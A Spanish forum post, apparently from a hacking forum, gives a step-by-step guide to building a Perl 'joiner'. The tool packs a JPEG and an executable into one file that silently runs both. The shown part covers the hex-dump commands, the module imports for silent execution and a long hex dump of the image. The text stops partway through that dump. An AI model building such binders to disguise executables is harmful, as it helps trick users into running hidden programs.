Temas - BigBear - Página 6

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - BigBear

Páginas 1 ... 4 5 6 7 8 ... 10

#201

Perl / [Perl] Creacion de un Joiner en Perl

Marzo 15, 2013, 12:06:38 PM

[Guia] : Creacion de un Joiner en Perl
[Autor] : Doddy Hackman

-- == Indice == --

0x01 : Presentacion
0x02 : Desarrollo
0x03 : Compilacion
0x04 : Herramientas y Codigos finales

-- == ------ == --

0x01 : Presentacion

Ok , esta es una guia corta sobre como hacer un joiner en perl , la idea original se me ocurrio cuando lei este You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login hecho por hecky neobits , la idea seria hacer lo mismo o algo parecido como esa guia que mostre , creo que esto es lo que me faltaba hacer en perl , bue , todavia me faltan un monton pero bue.

Cabe aclarar que nunca que hice un joiner porque lo que hare al estilo del manual que mostre.

Comencemos .........

0x02 : Desarrollo

Lo primero que necesitamos es bajar el archivo "joiner_manual.rar" de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login , una vez bajado lo descomprimimos y vemos que tenemos el instalador activeperl 5.8 con perl2exe + serial incluido , tambien veran los archivos "coraje.jpg" y "holamundo.exe" que seran los archivos que usaremos en el joiner ahora la idea es conseguir los bytes de los archivos que queremos poner en el joiner en este caso los archivos seran "coraje.jpg" y "holamundo.exe" , para eso pueden usar la herramienta You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login que esta en la parte "Codigos finales"

Solo con este comando :

Código: perl


perl hexnow.pl -hex coraje.jpg

Con esto creamos un archivo de texto con los bytes de coraje.jpg , lo mismo hacemos con holamundo.exe de la siguiente manera :

Código: perl


perl hexnow.pl -hex holamundo.exe

Una vez que conocemos los bytes de cada uno podemos empezar a codear el archivo You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login :

Primero llamamos a los modulos necesarios de la siguiente manera :

Código: perl


use Win32::Job;   #Modulo necesario para cargar comandos de forma silenciosa
use threads;      #Modulo necesario para cargar los dos archivos al mismo tiempo

Despues usamos los bytes de la siguiente forma :

Código: perl


my $nombre_uno =
  "coraje_uno.jpg";    #Nombre que va a tener el archivo cuando se cree
my $nombre_dos = "holamundo_dos.exe";    # Lo mismo

my $valor_uno =
"ffd8ffe000104a46494600010101006000600000fffe001c536f6674776172653a204d6963726f736f6674204f6666696365ffdb0043000a07070807060a0808080b0a0a0b0e18100e0d0d0e1d15161118231f2524221f2221262b372f26293429212230413134393b3e3e3e252e4449433c48373d3e3bffdb0043010a0b0b0e0d0e1c10101c3b2822283b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3bffc0001108012f010c03012200021101031101ffc4001c0001000300030101000000000000000000000506070103040208ffc4004910000104010203050602040c0405050000010002030405061112213107134151611422718191a132b1154252c11623243343627292a2d1e1f0173453c2358293b2f154555663d2ffc4001a010100030101010000000000000000000000010203040506ffc4002e1101000202010302030802030000000000000102031121041231324113229105142342516171b181a1c1e1f0ffdd00040028ffda000c03010002110311003f00d99111011110117cbded634b9ee0d681b924ec028abbab34f6377f6ccdd184b76ddaeb0de21bfa6fba0974545bbdb268ca80f75767b8edbf0c15ddcffbdb05053f6d562c9e1c4696b32f9496250c1d7c80fdea26623994c566de21aba2c3323da46b199a5d63258ec3467f561883dfb6dfd6dfeca0e3ed4f51e32e366ad9d9f20d07de8edc2deede3ec47cb654ae4ada785ed8ed58ddb87e8f4550d0dda1e335a562c60f65c8443792abddb923f69a7c47e5e2adeb466222202222022220222202228ecde7b19a771efbf95b4caf037a171e6f3e4d1d49f40824542e7757e034d309cae4a181fb6e21078a43f068e6b25cff006bf6f3b23ebe36e1c1d2dc832005d6251f103667cb9faaaa4394d3d55ee9819279c9ddd2c8d2f7b8f9ee563932f6f1159996d8f177733688869591ed96cd9ddba734ecd334fe19eebb81a7ff0028ebcffaca02deaed7d9327bccc57c7464efddd4846e39f99dcfdd55e5d6555bbf755657f97110dff35e19f595a77282b471fab89715cd37eaade2ba74c53a5a7aadb59258331706d7f5465ec0278b87da5c1bbf981b90147dec5629803f257a691e07274f6097155ab19fc9d9043edbc34f833ddfc9785ac96c4c18c6be591e79000b892ad5c39e7d77fa22d9f047a29f54fcd99a545a23c658c81e03ee96d97b1a3d40ebf92f769dd6fae9f9682a62f2f76e4f349b3219dc670ef8f1efb0dbe9d57b34d763fa973a592db8862eabbabec8f7c8f4675faecb6cd25a130ba3abed421ef2cbda04b6a5e6f7fc3f647a05d75af6c6b6e4bdfba77ad2c31779dd33bde1ef3847170f4dfc76f45f688aca08888322c9f6f104571f5f1d847bc35e5bde5a9bbbdf6f368076f995d47b5ed4b6cb4d0c3e280f1e2b264fc88d94aebeec86bea0b12e570924752fbfde92270da298f9f2fc2e3e7d0fdd62b99d359bd3964c394c7cf55c3a3c8dd8ef838723f555b45a7d32b566b1ea869b675febeb25c2297174dae3c8c711716ff7b75153e575bdd27da7564f102ee2dab8e0ff00dbb7d1670cb96a31b4762560feabc847ddb520d9f66570f22f256134cf3f9a3e8de2f823f24fd572b787f68777994ce5bb07ce69bc0fc495e3756d2f477e391b33bcb8cbff002e4aa8e739c777389f895c28f8179f55e7fa5be3d23d348fed677ea4c6d40463f1ad07f69cd0dfc9475bd4b92b5b813085be510dbefd5448049d80dc9561c2681d4fa8385d43133774efe9a51ddb3eaeebf2dd5ebd3e3af3adff003cb3b75192dc6f5fc2bef7b9ee2e7b8b89ea49dd7a6a632fde8679aa539e78eb338e67c719708dbe648e8b65d37d84d4aee6cfa8af7b53873f67adbb59f371e67e5b2d4e86328e2ea36a50a90d6aed1b08e36068ff0055bb07e43a772ce3ee456e9ccf82785c1d1c8c3b1695fa4fb3ad7f5f59e2fbb9dcc8b2b5dbfca210360e1bec1edf4e9bf91f9285d79d9052cd89323816c74f207de7c3d2298ffda7ec7c7cd62d8fbd97d1ba8d96236c956f539367c4f046fe6d70f10507eb64513a675152d5382832b48fb928d9f193b98de3ab4fa8ff00252c808baacd986a40f9ec48d8e3634b9ce71d80006e5615a33b57bf57534d5f256e3388b766494bac924d70e25dee9037f96df441bd22a9ff00c50d13ff00dfe0fee3ff00fe57b2aebdd277783b8d4140979d9ad7cc187e8ed8a0f8d6dac2a68cc21bd38124f238320837e723bc7e4073ff00e54e52b906428c172b3c3e19e36c91b87882370b30ed8f49bb5062a1d478b90587d28c8958c7f10745d789bf0ebf03e8a17b24ed22be2eb7f07f3965b15666eea961e7933c4b09f01e23e63c906b5a8f51e3b4be224c964a5e08d9c98c1f8a477835a3c4afce19dce6a0ed1f5182d8259e43b8af4e105cd89be9fbc953b96b999ed835a8a98e6ba3a1012220ff00c1047e323bd4f97c02dab4a68ec4690c78ad8e8077ae03beb0f1bc929f53e03d07241f9faef659ad28825f8496668db9c0f6c9f60775e2fe00eaefff001cc8ff00e8397eac441f98eaf64fad6d6db619d102ddc1965637f7efba9ea1d83ea29c8376fd1aad3b6fc25d2387cb603eeb7e4419862fb09d3f54b5f91bd6ef38756822261fa73fbabd61f4ce0f00ddb158bad5491b17b19ef1f8b8f32a551011110111101111017c4b0c53c6629a3648c7756bda083f22bed1054f23d97e8dc9b9cf970b0c4f77575773a2f1dfa3481f65073f617a4e473dd1cd91878ba06ccd21bf56eff75a4220cc61ec1f4cb37ef6f64a4f2da46376ff000a92a9d8ce8babc3de529ec96efb99ac3bdef8f0ecaf88821f19a4b4f618838ec3d481c06dc62205dfde3cfeea61110111101523b47ecfabeb0c61b15238e2cbc0378653cbbd1fb0e3f91f03e9baba4b2c7042f9a691b1c71b4b9ef79d8340e6493e016479ad699ad7b929b09a4a4752c5c476b1913b873c7f57c403b1d8753e3b0dd1311333a87fffd0a9f675ad2e689cbdba53d3b36629c163a9c6df7c4cde4391e9e20ffa2d08e5bb41d45b3b8eb69ba8ee8d6b7bd9c83e7bf21f62bd1a7749e2b4d41c34e1e29c8f7ec49b17bbe7e03d028dd5baf2a605aea5476b9947fbad899ef08cf8716de3e9d54e9d5186b58dde54bed160a58d11d2932377299590f1cb35ab05fdd37c006f404fe5bf985eaecf7198ca179f5350e3cc590b6c6beab6e41ee3e3237f777e5b9fddf1565d05d9759b7786a5d5e1cfb2f7f7b1d4939927c1d27ee6f86dcfc968baa74c51d55877d1b6d0d907bd5e703de824f0703fbbc5431ef88b6e210a29540361561007ff00ac2f3dac1e22e8dad632a4db8db77c2d276f8eca334ae52ecbed784cc0232b8b7f77313fd2b7f55e3e23f71f156256775662d1b50339a4e8bf3b8dc060993529b26f71b62099c18201f8c96efb7c3c39297d51d87636ff00f1fa7ec0c7ca1a01825ddd1388f1dfab4fd54a68b8064b5ee7b2cf00b68b23a301db90fd67fcf7dbeaaf966cc14eb4966d4d1c10c4de27c923835ad1e649e8aae0c931369d314d3d80ed23b3a7d9763f0f53215a520ca18e6b8bb6076db987fcba2b7698ed2f29a8ebfb445a3ee490890c6e92ad88de1ae1b7221dc3b75579a190a794a8cb742d4566bc9f86589e1cd3f30b3e89bfc09ed6bb90eeef15a9da5cd6feab2c83fbc9ff0018f24517ec7dcb56dae363193d1dba099f1b89fee39cbd888808888088880888808888088880888808888088b8dd0728888088bc19cc9c785c1ddc9cbb16d481f2edbfe2206e07ccf2419b76939abba9b3f1e84c349c11f2932338e61a391e13e8391f524053b8bc4d5c1e2d9471d035ac8c720e3b17bbc4b8edd4f9aaef6758a922c4cb9cba0bafe5a474f23ddd7849247d7727e615c15a1dd869db1b952b5a8d47160ee5d765e0a156166e23ab1b8be424800179208e67a80ae5a2bb3ec369aa35ad9a6d972af89ae9eccc78dc1e46eee1f06f3dfa73f52a035931b62be2293da5d1dccb5685fb750d2edcfe4b4e512c33fa9cae170f77046e7904f08df6039ac1f45eb1a2ccacd91bb2caed41772f1b1bcdc43ebbc869675db66efbec7c9bd7650c178ed028b70d9dc66ae8470b43c53bfb7eb46fe4d71f81fdca554aeadc58cce93c9e3c804cd59e19bfed01bb7ee02a9e93c83b29a5b1d71ff8df080f3e65bee93f50a61d7d3dbcc3d7d9680fc7672770de493336039de607080babb699678fb3c9c425c1b25889b2ec3f577df9f97301767652f69c4e6d81c0b9b9ab3b8df98df855ab3b85a7a870d67157d85d5ecb785dc2762d3bee08f50403f250e59f2a4f64faa1fa9a5cbbc57f668608eab5b1076e03846e6b9c3978f037e817afb5fa52bf47b32b57716b116a3b51b8751cf84fe60f87e152ba2343d1d1142c57ab3c9664b3207cb348d009d86c06c3c06e7ea57a75bc0db3a1b391b99c7fc826701fd60c247dc0442531f71991c6d5bd16dc166164add8efc9c011cfe6bd2ab3d9c5af6cecf70b29938f86b08f7fec12ddbe5c3b7c95990111105533faf20c3e59d89a58bb995bb146249e3ac06d0b4f4e227c4f928e1da6b72ec8a0d338c92e5b7378ac0b44c31d4e7b6cf3b1dddc8f21f151b6dffa0fb4ac9576f0da6e5d8db0d111e27c0e6b76da403f0b4f8150fa6b506524c96484b8c0e01ae9a48a08831fc6361b73ea4ede3cd695c736acda3d9bd31d66226656ec16b6ca0d4b0e9fd4b4aac362db1cfab629b9c62936dc9690ee6080af0b3ed198419ec941acf23621964631d1d3ab0925b5ba877193d64e641e436fa2d0566cadadf022222a22220222202222084d656f214348652d62da4dc8abb9d1edd47991ea06e7e4b36c2e060ab82ad9fc666678727244d99d725b04b2579e65af04ec5bbee0f8abdeb9d4b674fd3a30526c62de4ac8ad14b30de38b7eae3e7e8151b37a560a9a7bb86e5190bbda0cef758708e37bddd7668e4df4002bd2226da99d436c55dee6612190cfeb5cd6224c957b10e023ad197b606b44cf98b46e4971e41a76e402bb68cccd8d41a471d95b7188e7b116f20036048246e3d0edbfcd67789c465b2763f817dfb6b54ad1096e590fde49a2713eec43c06fb827ff0085acd3a9050a70d3ad188e0818238d83a35a06c028b4444ea15bc5638877aa7f6acf737b3cc8b1b2b6274ce862e271d86ce95a0fdb7523ac756d2d1f8575fb23bd95c782081a7674aff2f8799540a581ca6ac9d999d6733a4e2f7a0c6025b1423c371e7e87e7e4aa8a526d3a84de2b3185960869e3af433b6163636b623c5b00001d3a782965d705786ac2d86bc4c8a36f20c634003e41762b3d18deb943e71c1994d385ce01bfa6221cfccb5fb2d1565bae241571d8ec8bf7e0c7e4ebd978f46bb63b9f0eab51041008e8544b8b3fac589d4ec8b2d53b4a8ac32368c3436c59658e31bf08771066dbefbefb0fbadb5143070407348237079105659a01bdd69e96a96f0beadd9e27b7c010f276fbad4d65ba15fdfe33216c02196b27625603d762eff4530df07ad23d9fcdec5ac753e21e7632cb1dd886c39b5c3671f91e10b4259666ac1d39ac30fa9f70dac4fb15d27a08de7dd71f4079fd16a4d7073439a41046e08f150a64af6de61ca8bd4f38ada532f3b9bc422a333c8f3d984a94552ed3f2acc5681c992eda4b71fb2c6ddb72e2fe447f7788fc919ba3b2d96bd3ece3110cd6a16bf81ef20bc0db8a47387d8ab7c7660989114d1c8475e1703b2c9297663a7050ae2d5391f63ba6f7aeef9e3776dccec0edd5754bd94e19a78e95dbf51fd4164a0ede5e1e1f153a6ff02effd1d9553339a9ede4ec4d88d35331bdd92cb7923ef3603e2d67ed3fec3e2a957703afe8e3a7a58cd5325dad33380c73bb69003d4071df6fa8ea555b0b67258989ba4f3af930d42dd8de6b723482d66def35a40db9ec39f4e7e48d3b3b67e685e303566c8d99f1da4fdd8daffe5f9bb20c85eff10ddff1bbc7c82f6495b39a3af59ab251c9e7a8cc4495edc4049287100163c780dfa1e9cd5f7035b17530d5abe17b93458cda230b839a479ee3a9f32a414ecf896dee152ecef0f91c5e2aed8c943ecd364ae3ed0abbefdcb5db6c0faf2e6adc88a198888808888088880888822f5069dc66a7c69a195afdec3c41ed20f0b98e1e208e855725ecaf4f370d72ab229acd99abba28ecdb98caf8cedee96efc86c76e80745774418c63b333d3c7e1752c81cc9f1331a194691b9eef70c7efe7b1e177cd6cac7b5ed0e690e6b86e08e842cb3298a8eb6b6cf6024d9b573b57dae2e5f85e776bfefcd59fb38ccc992d150b6c9dede34baa4e3a1e28f90ff0ec8d2fcc4594ebdbeb4ed52d4b31126374fed144cea1d2f89fef03fdd0acb94cbd4c457efad39c4bb93238d85ef90f935a39955cecd1a25d3d63224b8c97ae4b33cb8ee7aedd7c7e3eaadfb0df7db9f9ab43af15754e14cb9da1cd49bdfcba5b2b1d4e5bcf2c7c1cbcf6e9f752782d7183cfc8d820b0e82cbba4138e171f8781f91503da2645f7ed43a6ebc858c2cefedb9a7c3f51bf5e7f45dda5a862f56695860c9d66baee3ddecef95beecac2dfc243873e9b7d146f95bb7247cded2b36a4c71cb69cbf41ade27cd0b8307f58736fdc053da0b3835068cc75d2ede66c4229c13b91233dd76ff1db7f9a8ba15e6ab4d95e7b26cba31c22570d9ce1e1c5e67ccf8f5505a7722cd13ae6ce2ad3bbac5671fdfd691c766473feb377f5e5fe14963d45771166a68b85ca8723c39ac8331584bb9090ecdad03e43b7a02566fd9bb641a2aa3e5fc523e47efe7bbcf35cf6ddaae3a7866e9caf20759b843e700f36460ee01f891f4057bf48d5f63d258b876d88acd7100efcdc388fe6a61d1d3c7ccf7e4b1f5f2b8e9e85a6f1433b0b1de63d47a8505a53b401a5ec7f05356cae89d57ddab79c376c91fea876dd3978fa6c7a2b3aafeaed255755506b1ee10da87730cdb6fb79823c41532df2e3ef8dc795cec6b1d355689bb2e728f7006fc4d9dae27e001dcfc9659633763b4fd6d59d044f8f038893bd1c43f9c70e84fa9dba780dd57dda53198e94333d83cbc2e6edfc6d0709a093edc437f2dfe8ad588ad632d522c763f112e1302c3c529986d35a1fb3b7500f8bb7e6392873d31f3cae8c7b64635ec3bb5c0107cc2fa5c0000d80d804739ac69739c1ad037249d8052ee72ba6d54ad7abbabdb8239e2775648d0e07e454364b5ce9bc592d9b2714b20fd483f8c3bf97bbc87cd41cdda5be676d8bd3f6e71bf27cee1137f7a89b56be655ee89e1ec3a5729a6ec3afe8cc8bea92789f8f9ddc50cbe9cfa7fbe615a34bf68d532d686273301c466072f6798fbb2fab1de3f0fa6eb3d9756eb1b5b7750e3e8b7d417bbf32144e52965f3c1832f971308ddc4c0cacc696fc1c39ae6b75586bf9995ba6b5f9ad65fa3117e7795f7e85574b63546684718f0baf1b7a01baba762daa725996e5285fb53da8aaf03e092c3f89ed6b8bb705dd4f41d55f166ae5e6ae7cb86d8bd4d51171b82a36de5f86d9a18f87db2e0d8bda1dc2c841e864773e1f41b127cb6e6b5629345e6a70da8da5d6ec89a4778319c0c6fa01ccfd495e94044440444404444141ed3a3f61b180d42de5ec5744331f28e41b1fc87d578b4bcc30fda0e73124964394ac2ec0de7b178e4fdbd4f33f256ad7b8dfd2da1f2d503777fb3ba4672fd667bc3ee166993cbcb5b1da5b59d784d892b6d1cd1b4edc6d7b785c371ea08f9a34af34984cf673c3fc05c770edd1fbede7c6e561b5622a7526b333b8628585ef3e400dcaaf680867ada68c1660f679a3b3287c3ff4cf16fb7dd74768d79d16023c744eda5c8ccd87e0ceae3f603e6adeceea6fb235e54ca32cd7e6b597b3bf7f7e53273fd56746b7e417b70d931a6f5232ec87868df021b5cf931dfa8ffdc7d095f0c63638dac60d9ad0001e8be67863b10be195bc4c78d8858ef9dbea6fd0d6dd2c618f31e3f96b0a333f82a9a8b15250b6360ee6c900f7a3778387fbe8ab5a1f51be37b74e64e4de789bbd499c7f9e8c746ff687e43d15e16de5f336acf35b472a457ed0755683e1a1a9681cb536f28af46e21c47802e23627d0ec7d4ae2ef6df90c9ed4b4d601e6d48366be577785a7d18d1f7276f4566c9c3982eef3193d4783c9f5edb0f09f839bcc7cc1eaa048d6a5a6bd1c5623181e7de983f8f6f5000ebf105469c76c3112a6653037a5bb5a964ec7b66a1ccccd7d87177118211cfe479787201bb0e4b608a36c30b2260d9ac686b47a0501a6f48c585b12e42e597643293ff396641f87cc37c82b12986f8e9da222235178f2796c7e1aa9b391b71d788742f3cdc7c80ea4fa0558d47aec55b9262b0ac8e7bac3c32cd29da380ff00dc7d153cfb158b46ee5b2915fb7e2f9a56f0b7d1addf60161973d71fef28aeed3f2ac377b45bf90263d3b8c219d3daed8d9bf10d07f7fc9424f43219621f9dcb58ba77dfb96bb8221f21fbb65c499fc542de76d879720c04fe4a3aceb1ab1ee2b4124a7cdc7842e0b65eab2f15aea1a76e0a737b6fff007e89aad8fa74c0f67ad1c647eb06f3faf54b791a945bbd99d8c3d4377ddc7e5d5532dea6c95b25ac9040c3fab1723f5eabb31ba72e641fdf592e8613ccb9ff0089df01fbcaa7dd351dd9ac7deb73db86ab051cdbf2973baa75c8819ce4964fc800a5279e2ad0ba699e191b06e5c543cd97c560ebfb356da4737f5233bf3f52aad93cbdaca4bc533b660fc31b7a0515e97e2db711db5ff69bf5318aba99ddbfd3bb379a932b36c3765761f719e7ea7d55ebb36d275327829aee43da1d1cb316b6364ef8daf006db90d237e64f8acd2189f3ccc862697c923835ad039927a2de6861f2b86af83c7e3a48994abb5dede1c0173c91bf23fda27a7a2f5e948a476c7879f499c979b5b9792ee94b3886473e93c864285aef1ac6c6db25d0004f32f6bb7dc01b9f1e654be83d6146ae3ec6132b09a997a32113b18d74afb8e3cccad0017bc9ea791ea3c0803d74f2b4afdab75ab4dde4b49e239dbb11c24ffb3f455ac74229f6e74194f88367a523ad7bc5dbee243cc9df6e619f60ad29cd4ac4774348873766c480334fe4c4647295fdcb07c385d2077d9494523a489af744f89c7ab1e46e3e848fbafb5ca872888883ffd2d99111011170e7358d2e7101a06e49f04117a933b434e60ec64722efe2636ec180fbd238f468f52b32d318c19aecf5d8ab4d35f696460611b98487f1346de9c97adf71dda06ac75f773c0e1e42da8df0b130eaf3e60787cbccab1d7a915692c3e3df7b12f7afdff6b8437f268530eac18e7d52ec6451c6e7b98d0d323b89e4789d80dfe807d1677abecfb76b46c00eecc756008f291fccff008765a3ac944fedb96cade278bbfb8f0d3bf5637dd6fd828b787add0e3efea2b1fa73f4ff00b772222c9f58f35ea62dc6de1798a689c1f14adeac70e842ba691d5bfa581c6e48361ca42398e8d9dbfb4dfde3fd8aa2f3daa6db3c2f6bdd14f19de29a33b3987d0ab44e9e5f5dd0fc6fc4c7eafedae22a0e13b407d37b286a66f76ee8cbcc1ee3ff00b43c0ffbe4af50cf15985934123258de376bd877047a15ac4edf39313133598d4c3b11110170e04b4807624755ca20fcdb97c7dcc5e56c53bc1c2c46f3c649df8bc77f9f55e25fa0b52e91c66a7800b6c31cec1ee588c0e31e87cc7a2ca73dd9c6770dc72c70fb7566f3ef201b903d5bd47dd469c19315ab3c7854d7dc662077943c8f26903eebe5cd2d24386c47220ae143148c39565300d4a50b2403f9d9377bb7f9f21f45d56b2d7ee8227b2f734fea83b0fa05e3454ecaef7ae57f896d6b7c088a534e69dc86a8cc458cc6c61d2bc12e738ecd63475713e4aea2d7d9669a390c99ccd961f67a6768b71c9f27fa75f8ecb4e35b2875236d0b8c18c15f80d7db99937fc5d3cbd54563aaeacd398e83171e8d13b206f0892add670bfcddef73dc9e7cd733d8ed0ae3fb9a1a4e3a5bff004b6ecb1c1bf4214bae97c75af948652f6234bd2b392999140653c4fe0680f9dfb721ea579fb2cc3ddbd7efeb5cac66397203bba91bbab21dfafcf6681f03e6bb30bd96cb67211e5b59647f4ad9610e8eab794119f2dbc7e1b01e7bad15ad6b1818c686b5a36000d8008c7264efe23c3e91114321111011110167fda6e7ecf0d6d25897ed7f2deecaf1fd0c3fac4fc46ff2055db2590ad8ac6d8c85b7f0415a33248ef4017e7ac47687047abf219dcad392696f3f85b235e3f93c7bf2686edcf901e3e08b56226796af8ac6c188c657c7d61b4503034799f327d49e6bd6baab5986e568ecd790490cad0f63dbd1c0f42bb559e946b5c3a6ecfecd46c4fb6fdd44e7ede7b0dd6478569188afb924b9bc449f124eeb4ed4d23a2d2d95918785cda72904787ba566d8e686e36b00361dd37f254bbd5fb2a379ed3fb7fcbd2888b37d1888baf1d8db5aa324fc7d4718a94247b5d969e7fd86faff00bf8cc46dcdd4f534e9e9dd6ff11fab8ad8cb5aa667d0a0c6fb334ed3db78dd91fa37f69df929d8bb3fca60cf7ba6f50cb0bbc61b0dde371f972fb2ba50a157194e3a74a16c3046366b1a3eff0015e85ac469f299f25ba8bf7dfcff004a7333fabf180372ba6bdb5bd3bea126e4faf0f33f92ef6768986681edb5f2145c46e04f55dcfe1b6eac76acfb2c5de77134c77e4c859c44a8d972f97f74d7d3569e0f5ef2cc2cdbfc454b0d4c7bbaa0d6fa72c3e263324d0f95c1ac6ba378249e839853cb36d5195bb26acd3dfa430d6606c12ba56c10c8c99f211b6c4069f0dbf3579c56771f996bfd8e62648f6ef217b4b248fe2d3cc214bee66252088a1b556a03a6b102f0a6fb64cad8c46d3b75df993b1f2faec8bccea372fbcb697c26707f2fc7c523faf78d1c2ffef0e6a9593ec7a07f13f17927467c23b0de21fde1fe4b4889e648992163985cd0785c362df42b89e78aac0f9e791b1451b4b9ef71d8340f128a5a95b7986099bd0f9dc0406c5caec35c3837bd8e40e1b9e836ebf651f730199c76fedb8ab95c0db732c0e68e7d3990b6fd338f9f5c6763cfdd89ccc1d07ef8f85ed23da641fd291e43c3fd0ad3155c17eddfcafc9982d259dd456db5f1b8e9a4dcece94b4b6367a971e417e8ad05a1aa68ac4185ae13dd9f67599f6db73e0d1e4d1feaad488a88888088880888808888088be5ef6c6c73dee0d6b46e49f008289aee7fd3fa8311a261792cb6ff006ac870feac0ce61a7fb447d879ac93b59af87a7ae26ad86af0d78e2898d999080d6093c760390e5b6fb78a8dd47ab72191d637f394aed8aaf96473227c3296384439346e36f00144e3a8dacd6561a70f1493d9936dcf3ebd5c7f328796e3d9f92743e30924ff0016e1cffb6e5625e6c7518f1b8dad461dfbbaf1363693d4ec36dd7a559e9d6351108ed430fb469cc943c5c3c75656efe5ee9598e2de64c5d571ff00a4d1f65af39a1cd2d3d08d8acbb1a6863a29b0f7294a66a33be274cc97de70dc969d8f2e842cb2cea37adbd1fb3f3462cd3bf787ca2f71a1159697e3a7eff61b989c36900f878fc9787a1d8aceb78b787d2d3256f1bacbcb6cd89a4831f446f6ee3fbb8bfabe6ef905a760f0d5b0189871f547bb18ddcf239c8e3d5c7e2aa9a0b1e2de4ef66a56ee213ec95f71d36e6f23e7b0dfe2af6b7ac6a1f2bd6679cd9a67da3887ffd3bca222b3d51426a4cf9c441157a710b594b8e11d4aa3abdc7c48f20a6d57da63a9dae61277b63fe574a680170e61c3dedc7e5f3292cf2da6b599844e7fb3bc9e1f0516aaf6b9723a829ccdb56413ee700e6e6347937ee37f82b0e033f8ed4549b76948c3270812c7faf19fd93fe7d1682a839eec9b1d7722eca60af4f82bee3bb9d5f9c6e3e278771b6fe876f45571e3cb3494922af7f04bb4aaac6c7067f136c6df8ac46e691f46f3f9af43744eb6bc5adc86acad5222d1c6da3577713bf838ec47c7eca76e8fbc55e8cce7f1980addfe4ad36107f0b3abde7d1a399fc944e374fe63b41b4cb59b826c669d610f8a993c32db3e05fe21be3f979ab3e0bb36d3f85b3edd2452e4f21bf11b77dfdebf7f303a0f8edbfaab6a6d85f34db8f675c30c55e16430c6d8e28da1ac6306c1a07400782ec4450c44444044440444404444044441f064635ed8cbda1eedf85a4f33b75d954fb52cc9c3682bef61da6b40558f978bf91ff0f12af66b3b37fc5ca160cbb50c74ecc73802367493c6e24fc8f00f92faed3e7fd21ab74b6046c5a6736a56ee3986f4fb07fc51311b9d30fa784ca642c36bd5c7d89647740233f73d02d7f41e881a6e075cbc18fc8ca36e5cc42df207ccf89572456d3b69862b3b11111b8a8dae7072c36467e944e9070865d8d8373c23a483e1d0fa7c15e51263644cc4ee3cb23af6038327af2f2ead7b0a94b4f6dcc6c9900d02c41ff300720f07a3bf71562ca685c65e9dd66a3e4c75871ddce836e079f32c3cbe9b28a3a1f390c73475b3151ec9e3744fef6b10784fc0f55cf7c53b89af97a14ebbb79d72b1690a428e94c7c5c3b3df08964dc6c789fef1dfeaa42ae46add9a68ab4c25301e191cce6d0ef2dfa13e9e0ab9168fc95a8a38331a8ec58ab1b43457ad1881ae681b6ce2399566a94eb50aacab5216430c6366b183601743ccaeddc8bc399ca4386c54f7a6e6236fbadf17b8fe168f895ec612e63491b123723c916dfb3e955b524becbad747d8686879bc632e3fb2ee107f3569548ed07ff18d2c77e7fa45bb7f79892cf37a25b22222abcf1111011110111101111011110111101111079b216cd0a135b15e7b262617086067148f3e4d1e2565917697a82dde923b56719a7f776d1d6bd565327cdc4b5ab5c547ed1afb2cc106998bb913641ae7cf34ac6b856aedfc4fd8f427a03f1f244d7cabff00c16b990c365a1c8de865b790b86e4566004063b66f0900f4db87ccf2f15138dc8decff006a50bf2d0f7573198e3148d0439ae783b1734f910fdfe6a670ba934d56c04d162ae35f0e3227131bdc43c86ee77e7d41f3f5552ecb2e4b91d5796bb39de59e22f71f52f054baa62bdd5d35544452ea111101111011110179eedfab8eaceb16e66c518f13d49f203a93e817a1705ad2e0e2d05cde876e6110a6c54725abf370dfc9d7929e1a9bc3eb54946cf9de3a3de3c07fbf3573444445742a5eba85d6350e93863db8df911b027facc574550ccb1b73b54d2750b5e7ba73e725be9cc7dd892cf37a25ae2222ab80444404444044441fffd4d99111011110111101111015032fa16dea7d7d62fe4a57c5858e08a1ee5afd9d6b6f7b879730ce2773f1247cd5fd7082ab9becd74b66e90ae71915391ade18e7a8d11bdbcb6f0e4ef9eeb35d03867e9dd779dc3492b667558c37bc68db8871020ede1c885baaca648451edab2ec6b1a1b768326041f2e107ee0a434c5eb85a511159e888888088880888808888088880aa98069ca76df3ca372cc5d0d86c76d8b801cfcff1956a73835a5ce3b00372557fb1c8dd7e6d43a89fb9f6db9ddc64fecb773ff70fa289737513f2c434e44552ed1b2792a181ad5b1529af6325723a7ed201de10fdf777a1e5b6feaa1c6b66eb9591d56c7a0753626c7e98bf251b6258ae476657481db30b9ae000fc5bf801e83af3b9e2bb42c36532f1e28c37a8d99b7ee05dac6213edfb24fefdba22d6acd6752b4a2222a2222022220222202222022220222202cc75f4671bda569acb1f762b51be9bcf2db7e7b7ddff0065a72a3f6b78b92f68b7ddadb8b38b99b6e323afbbc8fd8eff00244c4ea76f5a2f1e2323165b1356fc4776d8883fe07c47c8ee17b159e9c4ec44444888880888808888088882bdaeb2a313a4aeca1dc32cccee63dba92ee5cbe5b9f92f7e072f88ecf745e2f177a6749907422434ebb0c933deff00788e11d3aedb9d87259bf6b39defb2d57155dfff0027fc6c9b1e5c67a7d07e6a7f4dc8d9abc70e94c77e92cbcd131d732360931c4f70dcf1c87993d7dd0a25c79262d7e6788582feb1d516abbac88e8e99a1ff005eebbbd9fd366f2683e8775013e465cb411b9d7b3d95124ec6c16e56f7151b3177b8e0d1c3c5b100edb1d86eae588ecdea0b0cc8ea5b0ecde40731deff003117a323e9f55cf69515caf86c6e431f4df6198cbec9e68616fbddd70b9a7603fb5f2489d4b28b56278852f4f9bfa7af3dd9e339758696d685ac75892470e6787877db90f4dfe4a75989c96add4588b0719671f8ec5d96db362d3381f339bb16b1acea01f1276faa8d17a5d5fac34f8c14361d0e3ec8b36ec3e373191b796ec248ea40216b8af92f37b6e57c97fcb1e05ca22cd80888808888088880888808888088880baec4115aad2d79d81f14ac2c7b4f47348d885d8883ffd5edd2464d33a8323a32eb88ee24335173bfa488f3e5f2e7f55745e2ed3349d8cb52873b87e2666717bbe2e01ce56752df53d76f891e2bc5a5b5257d4b8a6d866ccb11ecdb10f8c6ff00f2f2530ecc17dc76ca691114ba4444404444044440519a8b37069ec34f7e6d8968e1899fb6f3d02f7